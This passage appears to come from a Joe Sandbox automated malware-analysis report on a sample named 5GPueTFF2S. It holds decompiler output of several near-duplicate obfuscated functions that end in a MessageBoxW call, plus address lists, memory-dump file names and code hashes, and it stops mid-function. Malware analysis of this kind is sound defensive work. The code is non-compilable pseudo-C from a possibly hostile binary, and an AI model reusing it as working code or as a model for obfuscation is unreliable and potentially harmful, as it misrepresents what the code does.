						_t214 = _t214 + 1;
						if(_t214 < 6) {
							L1:
							_t169 =  *((intOrPtr*)(_t217 - 0xb));
							_t220 =  *0x1000c9b - _t169; // -28
							if(_t220 >= 0) {
								L2:
								if( *((intOrPtr*)(_t217 - 1)) == 0) {
									_t78 =  *((intOrPtr*)(_t217 - 0x6c));
									_t207 =  *(_t217 - 0x34);
									asm("cdq");
									if(_t78 !=  *((intOrPtr*)(_t217 - 0x38)) || _t169 != _t207) {
										 *(_t217 - 0x90) =  *((intOrPtr*)(_t217 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t217 - 1));
										 *(_t217 - 0x2c) =  *(_t217 - 0x2c) - ( *(_t217 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
										 *0x1000ca0 =  *0x1000ca0 +  *(_t217 - 0x7c);
										 *0x1000c9e =  *0x1215420;
										 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t217 - 0x40));
										asm("sbb [0x1000c8c], eax");
										do {
											goto L13;
										} while (_t220 >= 0);
										goto L2;
									} else {
										goto L7;
									}
								} else {
									_t141 =  *0x1000d04; // 0xffffffff
									asm("cdq");
									_t88 =  *0x1000d00; // 0xfffff835
									_t206 = _t169 & _t141;
									 *0x1000d00 = E00ECEE50( *(_t217 - 0x1c) & _t88, _t206, _t88, _t141);
									 *0x1000d04 = _t206;
									continue;
									do {
										while(1) {
											L13:
											goto L14;
										}
										L7:
										_t161 =  *0x1000c88 |  *0x1000c8c;
										 *_t161 =  *_t161 + _t78;
									} while ( *_t161 == 0);
									_t212 =  *(_t217 - 0x74);
									_t84 =  *0x1000c83 & 0x000000ff;
									asm("cdq");
									_t163 =  *((intOrPtr*)(_t217 - 0x78)) - _t84;
									asm("enter 0xfa1b, 0x8b");
									_push(_t217);
									 *((char*)(_t132 - 0x35dc73bb)) = _t163;
									 *((intOrPtr*)(_t217 - 0x78)) = _t163;
									 *(_t217 - 0x74) = _t212 & _t84;
									 *(_t217 - 0xa) = ( *(_t217 - 0xa) & 0x000000ff) + ( *(_t217 - 0x18) & 0x0000ffff);
									_t85 =  *((intOrPtr*)(_t217 - 4));
									 *0x1000cf0 = _t132;
									_t168 = _t85 +  *0x1000cc8 + 1;
									 *0x1000cd4 = _t168;
									 *0x1000cf4 = 0;
									_t86 = _t85 + 0x1000cf4;
									goto L12;
								}
							}
							L13:
							goto L14;
						}
						_t142 =  *0x1000d00; // 0xfffff835
						 *0x1000ce0 = 2;
						 *0x1000ce4 = 0;
						 *(_t217 - 0x70) = _t142 * 0x6eb594ba;
						_t144 =  *0x1000ce4; // 0x0
						 *0x110030c =  *(_t217 - 0x60);
						_t91 =  *0x1000ce0; // 0x0
						_t175 = _t91 | _t144;
						if(_t175 == 0) {
							 *((intOrPtr*)(_t217 - 0xbc)) = 0;
							if( *((intOrPtr*)(_t217 - 6)) != 0) {
								_t92 = 0;
							} else {
								_t92 = 1;
							}
							 *((short*)(_t217 - 0x24)) =  !( *0x1000d00 + _t92);
						} else {
							if(_t91 != 1 || _t144 != 0) {
								if(_t91 == 2 && _t144 == 0) {
									_t121 =  *0x1000cdc; // 0x84521e70
									 *(_t217 - 0x60) = ( *(_t217 - 0x68) ^ _t121 ^  *0x1000d00) * (_t121 + 0xffffbb58);
									_t195 =  *0x1000c94; // 0x0
									_t196 = _t195 * 0x2d40daef;
									 *(_t217 - 0x7c) =  *(_t217 - 0x7c) * ( *0x1000cec & 0x0000ffff);
									 *(_t217 - 0x90) = _t196;
									asm("cdq");
									 *((intOrPtr*)(_t217 - 0x38)) = ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff) + ( *(_t217 - 0x84) & 0x0000ffff);
									 *(_t217 - 0x34) = _t196;
								}
							} else {
								asm("cdq");
								 *0x1000cb8 =  *((intOrPtr*)(_t217 - 4)) - 0x4fef3c23;
								 *0x1000cbc = _t175;
								 *((intOrPtr*)(_t217 - 0x4c)) =  *0x1215420;
								 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
							}
						}
						 *((short*)(_t217 - 0x154)) =  ~(( *(_t217 - 0xc4) +  *((intOrPtr*)(_t217 - 0xa4))) *  *(_t217 - 0xc4) *  *(_t217 - 0x14) ^ 0x0000701c);
						_t94 = 0x20b;
						do {
							 *((char*)(_t217 - 0xb)) =  *((char*)(_t217 - 0xb)) + 1;
							_t94 = _t94 - 1;
						} while (_t94 > 0);
						_t97 = ( *(_t217 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
						 *0x1000c84 = 0;
						if(_t97 != 0) {
							_t215 = 0;
						} else {
							_t60 = _t97 + 1; // 0x20b
							_t215 = _t60;
						}
						asm("cdq");
						_t186 =  *(_t217 - 0x2c);
						asm("cdq");
						asm("adc edx, [0x1000cc4]");
						_t103 = E00ECEE50(( *(_t217 - 0x18) & 0x0000ffff) + ( *(_t217 - 0xc) & 0x000000ff) + 1,  *(_t217 - 0xc), _t186 +  *0x1000cc0, _t186);
						asm("sbb edx, edi");
						 *0x1000c83 = 1;
						if((_t103 - _t215 | _t186) != 0) {
							 *0x1000c83 = 0;
						}
						if( *0x1000c84 == 0) {
							 *((short*)(_t217 - 0x24)) = 0x83;
							asm("cdq");
							 *0x1000cc8 = ( *(_t217 - 0x18) & 0x0000ffff) + 0xf;
							_t113 =  *0x1000cd0; // 0x0
							 *0x1000ccc = _t186;
							 *((char*)(_t217 - 5)) =  *((intOrPtr*)(_t217 - 3)) +  *((intOrPtr*)(_t217 - 0x28)) + (_t113 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
							asm("cdq");
							 *((intOrPtr*)(_t217 - 0xa0)) =  *((intOrPtr*)(_t217 - 0xa0)) -  *0x1000cd0 - 0x3811;
							asm("sbb [ebp-0x9c], edx");
						}
						_t73 = _t217 - 0x160; // 0x60f1ba1c
						_t187 = _t73;
						_t74 = _t217 - 0x1ac; // 0x60f1b9d0
						_t106 = _t74;
						MessageBoxW(GetForegroundWindow(), _t106, _t187, 0x10);
						return 0;
					}
				}
			}






































                                              0x00ec6e19
                                              0x00ec6dbd
                                              0x00ec6dc1
                                              0x00ec6dc4
                                              0x00ec6dc8
                                              0x00ec6dc9
                                              0x00ec6dcb
                                              0x00ec6dcd
                                              0x00ec6d71
                                              0x00ec6d71
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d77
                                              0x00ec6d77
                                              0x00ec6da2
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c6f
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb4
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6d77
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6ca3
                                              0x00ec6d77
                                              0x00ec6d77
                                              0x00ec6d77
                                              0x00000000
                                              0x00ec6d77
                                              0x00ec6d13
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00000000
                                              0x00ec6d6e
                                              0x00ec6c74
                                              0x00ec6d77
                                              0x00000000
                                              0x00ec6d77
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880
                                              0x00ec7880
                                              0x00ec6d77

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: 83fad09634da0e94cb6b51e93ed9f35108c6a64033fbe958bdec6798c0487fd2
                                              • Instruction ID: f7f9e72e464e6fb96aed2c29b9410025ca39efe535f5bc050896270eef1ddf38
                                              • Opcode Fuzzy Hash: 83fad09634da0e94cb6b51e93ed9f35108c6a64033fbe958bdec6798c0487fd2
                                              • Instruction Fuzzy Hash: FC51D3759042998ECB2ACF64D941FFEBBF2EB59300F1450AAE4C5E7249DA3A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6E1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 81%
                                              			E00EC6E1C(void* __ebx, signed int __esi) {
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t81;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t87;
				signed char _t88;
				void* _t90;
				void* _t93;
				void* _t99;
				WCHAR* _t102;
				signed char _t109;
				signed short _t117;
				signed int _t129;
				signed int _t136;
				signed int _t138;
				signed int _t155;
				signed int _t157;
				char _t159;
				intOrPtr* _t164;
				signed int _t165;
				signed int _t171;
				signed int _t182;
				WCHAR* _t183;
				signed int _t191;
				signed int _t192;
				signed int _t202;
				signed int _t203;
				signed int _t208;
				signed int _t210;
				void* _t211;
				void* _t213;
				void* _t217;

				_t210 = __esi;
				_t129 = __ebx - 1;
				asm("adc esp, [esi+ebx-0x53c51c7a]");
				asm("sbb al, 0xe7");
				while(1) {
					 *(_t213 + _t210 * 2 - 0x160) = ( *(_t213 + _t210 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
					_t210 = _t210 + 1;
					if(_t210 >= 6) {
						break;
					}
					_t165 =  *((intOrPtr*)(_t213 - 0xb));
					_t217 =  *0x1000c9b - _t165; // -28
					if(_t217 >= 0) {
						if( *((intOrPtr*)(_t213 - 1)) == 0) {
							_t74 =  *((intOrPtr*)(_t213 - 0x6c));
							_t203 =  *(_t213 - 0x34);
							asm("cdq");
							if(_t74 !=  *((intOrPtr*)(_t213 - 0x38)) || _t165 != _t203) {
								 *(_t213 - 0x90) =  *((intOrPtr*)(_t213 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t213 - 1));
								 *(_t213 - 0x2c) =  *(_t213 - 0x2c) - ( *(_t213 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t213 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t213 - 0x40));
								asm("sbb [0x1000c8c], eax");
							} else {
								_t157 =  *0x1000c88 |  *0x1000c8c;
								 *_t157 =  *_t157 + _t74;
								if( *_t157 != 0) {
									_t208 =  *(_t213 - 0x74);
									_t80 =  *0x1000c83 & 0x000000ff;
									asm("cdq");
									_t159 =  *((intOrPtr*)(_t213 - 0x78)) - _t80;
									asm("enter 0xfa1b, 0x8b");
									_push(_t213);
									 *((char*)(_t129 - 0x35dc73bb)) = _t159;
									 *((intOrPtr*)(_t213 - 0x78)) = _t159;
									 *(_t213 - 0x74) = _t208 & _t80;
									 *(_t213 - 0xa) = ( *(_t213 - 0xa) & 0x000000ff) + ( *(_t213 - 0x18) & 0x0000ffff);
									_t81 =  *((intOrPtr*)(_t213 - 4));
									 *0x1000cf0 = _t129;
									_t164 = _t81 +  *0x1000cc8 + 1;
									 *0x1000cd4 = _t164;
									 *0x1000cf4 = 0;
									_t82 = _t81 + 0x1000cf4;
									 *_t164 =  *_t164 + _t82;
									 *_t82 =  *_t82 + _t82;
									 *_t82 =  *_t82 + _t82;
								}
							}
						} else {
							_t155 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t84 =  *0x1000d00; // 0xfffff835
							_t202 = _t165 & _t155;
							 *0x1000d00 = E00ECEE50( *(_t213 - 0x1c) & _t84, _t202, _t84, _t155);
							 *0x1000d04 = _t202;
						}
					}
				}
				_t136 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t213 - 0x70) = _t136 * 0x6eb594ba;
				_t138 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t213 - 0x60);
				_t87 =  *0x1000ce0; // 0x0
				_t171 = _t87 | _t138;
				if(_t171 == 0) {
					 *((intOrPtr*)(_t213 - 0xbc)) = 0;
					if( *((intOrPtr*)(_t213 - 6)) != 0) {
						_t88 = 0;
					} else {
						_t88 = 1;
					}
					 *((short*)(_t213 - 0x24)) =  !( *0x1000d00 + _t88);
				} else {
					if(_t87 != 1 || _t138 != 0) {
						if(_t87 == 2 && _t138 == 0) {
							_t117 =  *0x1000cdc; // 0x84521e70
							 *(_t213 - 0x60) = ( *(_t213 - 0x68) ^ _t117 ^  *0x1000d00) * (_t117 + 0xffffbb58);
							_t191 =  *0x1000c94; // 0x0
							_t192 = _t191 * 0x2d40daef;
							 *(_t213 - 0x7c) =  *(_t213 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t213 - 0x90) = _t192;
							asm("cdq");
							 *((intOrPtr*)(_t213 - 0x38)) = ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff) + ( *(_t213 - 0x84) & 0x0000ffff);
							 *(_t213 - 0x34) = _t192;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t213 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t171;
						 *((intOrPtr*)(_t213 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t213 - 0x154)) =  ~(( *(_t213 - 0xc4) +  *((intOrPtr*)(_t213 - 0xa4))) *  *(_t213 - 0xc4) *  *(_t213 - 0x14) ^ 0x0000701c);
				_t90 = 0x20b;
				do {
					 *((char*)(_t213 - 0xb)) =  *((char*)(_t213 - 0xb)) + 1;
					_t90 = _t90 - 1;
				} while (_t90 > 0);
				_t93 = ( *(_t213 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t93 != 0) {
					_t211 = 0;
				} else {
					_t56 = _t93 + 1; // 0x20b
					_t211 = _t56;
				}
				asm("cdq");
				_t182 =  *(_t213 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
				_t99 = E00ECEE50(( *(_t213 - 0x18) & 0x0000ffff) + ( *(_t213 - 0xc) & 0x000000ff) + 1,  *(_t213 - 0xc), _t182 +  *0x1000cc0, _t182);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t99 - _t211 | _t182) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *((short*)(_t213 - 0x24)) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t213 - 0x18) & 0x0000ffff) + 0xf;
					_t109 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t182;
					 *((char*)(_t213 - 5)) =  *((intOrPtr*)(_t213 - 3)) +  *((intOrPtr*)(_t213 - 0x28)) + (_t109 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t213 - 0xa0)) =  *((intOrPtr*)(_t213 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t69 = _t213 - 0x160; // 0x60f1ba1c
				_t183 = _t69;
				_t70 = _t213 - 0x1ac; // 0x60f1b9d0
				_t102 = _t70;
				MessageBoxW(GetForegroundWindow(), _t102, _t183, 0x10);
				return 0;
			}




































                                              0x00ec6e1c
                                              0x00ec6e1c
                                              0x00ec6e1d
                                              0x00ec6e24
                                              0x00ec6e28
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00000000
                                              0x00000000
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb4
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6d13
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d1f
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e17
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: b690d2b6b321d36a9df88f383e328e09ecfd8070a186f439ffb9d7665a14a7d3
                                              • Instruction ID: 3354c138842121bfc923201b358970feeb40880f972afbe17fe868c3d052d1b0
                                              • Opcode Fuzzy Hash: b690d2b6b321d36a9df88f383e328e09ecfd8070a186f439ffb9d7665a14a7d3
                                              • Instruction Fuzzy Hash: D351D6359042998ACB29CF74D945FFDBBF6FB59300F14906AE4C4E7349DA3A8942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6DD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00EC6DD0(void* __ebx, signed int __esi) {
				intOrPtr _t73;
				signed int _t79;
				intOrPtr _t80;
				intOrPtr* _t81;
				signed int _t83;
				signed int _t86;
				signed char _t87;
				void* _t89;
				void* _t92;
				void* _t98;
				WCHAR* _t101;
				signed char _t108;
				signed short _t116;
				signed int _t128;
				signed int _t135;
				signed int _t137;
				signed int _t154;
				signed int _t156;
				char _t158;
				intOrPtr* _t163;
				signed int _t164;
				signed int _t170;
				signed int _t181;
				WCHAR* _t182;
				signed int _t190;
				signed int _t191;
				signed int _t201;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t215;

				_t209 = __esi;
				_t128 = __ebx - 1;
				asm("adc eax, [edi+0x4cd25c11]");
				while(1) {
					 *(_t212 + _t209 * 2 - 0x160) = ( *(_t212 + _t209 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
					_t209 = _t209 + 1;
					if(_t209 >= 6) {
						break;
					}
					_t164 =  *((intOrPtr*)(_t212 - 0xb));
					_t215 =  *0x1000c9b - _t164; // -28
					if(_t215 >= 0) {
						if( *((intOrPtr*)(_t212 - 1)) == 0) {
							_t73 =  *((intOrPtr*)(_t212 - 0x6c));
							_t202 =  *(_t212 - 0x34);
							asm("cdq");
							if(_t73 !=  *((intOrPtr*)(_t212 - 0x38)) || _t164 != _t202) {
								 *(_t212 - 0x90) =  *((intOrPtr*)(_t212 - 0x40)) +  *0x1000d10 +  *0x1000c84 -  *((intOrPtr*)(_t212 - 1));
								 *(_t212 - 0x2c) =  *(_t212 - 0x2c) - ( *(_t212 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
								 *0x1000ca0 =  *0x1000ca0 +  *(_t212 - 0x7c);
								 *0x1000c9e =  *0x1215420;
								 *0x1000c88 =  *0x1000c88 -  *((intOrPtr*)(_t212 - 0x40));
								asm("sbb [0x1000c8c], eax");
							} else {
								_t156 =  *0x1000c88 |  *0x1000c8c;
								 *_t156 =  *_t156 + _t73;
								if( *_t156 != 0) {
									_t207 =  *(_t212 - 0x74);
									_t79 =  *0x1000c83 & 0x000000ff;
									asm("cdq");
									_t158 =  *((intOrPtr*)(_t212 - 0x78)) - _t79;
									asm("enter 0xfa1b, 0x8b");
									_push(_t212);
									 *((char*)(_t128 - 0x35dc73bb)) = _t158;
									 *((intOrPtr*)(_t212 - 0x78)) = _t158;
									 *(_t212 - 0x74) = _t207 & _t79;
									 *(_t212 - 0xa) = ( *(_t212 - 0xa) & 0x000000ff) + ( *(_t212 - 0x18) & 0x0000ffff);
									_t80 =  *((intOrPtr*)(_t212 - 4));
									 *0x1000cf0 = _t128;
									_t163 = _t80 +  *0x1000cc8 + 1;
									 *0x1000cd4 = _t163;
									 *0x1000cf4 = 0;
									_t81 = _t80 + 0x1000cf4;
									 *_t163 =  *_t163 + _t81;
									 *_t81 =  *_t81 + _t81;
									 *_t81 =  *_t81 + _t81;
								}
							}
						} else {
							_t154 =  *0x1000d04; // 0xffffffff
							asm("cdq");
							_t83 =  *0x1000d00; // 0xfffff835
							_t201 = _t164 & _t154;
							 *0x1000d00 = E00ECEE50( *(_t212 - 0x1c) & _t83, _t201, _t83, _t154);
							 *0x1000d04 = _t201;
						}
					}
				}
				_t135 =  *0x1000d00; // 0xfffff835
				 *0x1000ce0 = 2;
				 *0x1000ce4 = 0;
				 *(_t212 - 0x70) = _t135 * 0x6eb594ba;
				_t137 =  *0x1000ce4; // 0x0
				 *0x110030c =  *(_t212 - 0x60);
				_t86 =  *0x1000ce0; // 0x0
				_t170 = _t86 | _t137;
				if(_t170 == 0) {
					 *((intOrPtr*)(_t212 - 0xbc)) = 0;
					if( *((intOrPtr*)(_t212 - 6)) != 0) {
						_t87 = 0;
					} else {
						_t87 = 1;
					}
					 *((short*)(_t212 - 0x24)) =  !( *0x1000d00 + _t87);
				} else {
					if(_t86 != 1 || _t137 != 0) {
						if(_t86 == 2 && _t137 == 0) {
							_t116 =  *0x1000cdc; // 0x84521e70
							 *(_t212 - 0x60) = ( *(_t212 - 0x68) ^ _t116 ^  *0x1000d00) * (_t116 + 0xffffbb58);
							_t190 =  *0x1000c94; // 0x0
							_t191 = _t190 * 0x2d40daef;
							 *(_t212 - 0x7c) =  *(_t212 - 0x7c) * ( *0x1000cec & 0x0000ffff);
							 *(_t212 - 0x90) = _t191;
							asm("cdq");
							 *((intOrPtr*)(_t212 - 0x38)) = ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff) + ( *(_t212 - 0x84) & 0x0000ffff);
							 *(_t212 - 0x34) = _t191;
						}
					} else {
						asm("cdq");
						 *0x1000cb8 =  *((intOrPtr*)(_t212 - 4)) - 0x4fef3c23;
						 *0x1000cbc = _t170;
						 *((intOrPtr*)(_t212 - 0x4c)) =  *0x1215420;
						 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
					}
				}
				 *((short*)(_t212 - 0x154)) =  ~(( *(_t212 - 0xc4) +  *((intOrPtr*)(_t212 - 0xa4))) *  *(_t212 - 0xc4) *  *(_t212 - 0x14) ^ 0x0000701c);
				_t89 = 0x20b;
				do {
					 *((char*)(_t212 - 0xb)) =  *((char*)(_t212 - 0xb)) + 1;
					_t89 = _t89 - 1;
				} while (_t89 > 0);
				_t92 = ( *(_t212 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
				 *0x1000c84 = 0;
				if(_t92 != 0) {
					_t210 = 0;
				} else {
					_t56 = _t92 + 1; // 0x20b
					_t210 = _t56;
				}
				asm("cdq");
				_t181 =  *(_t212 - 0x2c);
				asm("cdq");
				asm("adc edx, [0x1000cc4]");
